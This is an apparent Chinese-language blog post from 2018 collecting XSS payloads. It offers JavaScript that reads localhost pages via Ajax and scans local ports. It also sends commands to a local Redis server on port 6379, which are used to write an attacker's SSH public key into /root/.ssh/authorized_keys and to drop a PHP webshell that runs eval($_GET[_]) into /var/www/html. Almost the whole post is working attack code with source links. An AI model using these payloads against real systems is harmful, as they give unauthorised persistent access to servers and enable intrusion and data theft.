XSS 相关 payload 集合

Ajax 获取数据

GET

function loadXMLDoc()
{
    var xmlhttp;
    if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
        xmlhttp=new XMLHttpRequest();
    }
    else{// code for IE6, IE5
        xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }
    xmlhttp.onreadystatechange=function(){
        if (xmlhttp.readyState==4 && xmlhttp.status==200){
            document.getElementById("out").innerHTML=xmlhttp.responseText;
        }
    }
    xmlhttp.open("GET","http://127.0.0.1:80/",true);
    xmlhttp.send();

}


var a =document.createElement("a");
a.id = "out";
bd = document.getElementsByTagName("body")[0];
bd.appendChild(a);


loadXMLDoc();

POST 写 redis

写 ssh 公钥

var keydir = "/root/.ssh";
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\nssh-rsa AAAAB... virusdefender@LiYangs-MacBook-Pro.local\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + keydir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"authorized_keys\"); ' + '\' 0' + "\r\n");

var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('save\r\n');

写 php webshell

<a id="flag">pwn</ a>
level=low_273eac1c
<script>
var xmlHttp;
if(window.XMLHttpRequest){
    xmlHttp = new XMLHttpRequest();
}
else{
    xmlHttp = newActiveXObject("Microsoft.XMLHTTP");
}
var formData = new FormData();
formData.append("0","flushall"+"\n"+"config set dir /var/www/html/"+"\n"+"config set dbfilename shell.php"+"\n"+'set 1 "\\n\\n<?php header(\'Access-Control-Allow-Origin:*\');eval($_GET[_]);?>\\n\\n"'+"\n"+"save"+"\n"+"quit");
xmlHttp.open("POST","http://127.0.0.1:6379",true);
xmlHttp.send(formData);
</script>

来源

https://xz.aliyun.com/t/2607#toc-2
https://strcpy.me/index.php/archives/751/

端口扫描

payload

var TagName = document.getElementsByTagName("body")[0];
ports=[443,80,81,88,6379,8000,8080,8088];
for(var i in ports){
    var script =   document.createElement("script");
    poc = "var data = '" + ports[i] + " OPEN; '; console.log(data);"
    script.setAttribute("src","http://127.0.0.1:" + ports[i]);
    script.setAttribute("onload", poc);
    TagName.appendChild(script);
}

来源

https://xz.aliyun.com/t/2607#toc-2
posted @ 2018-08-25 17:08  hac425  阅读(271)  评论(0编辑  收藏  举报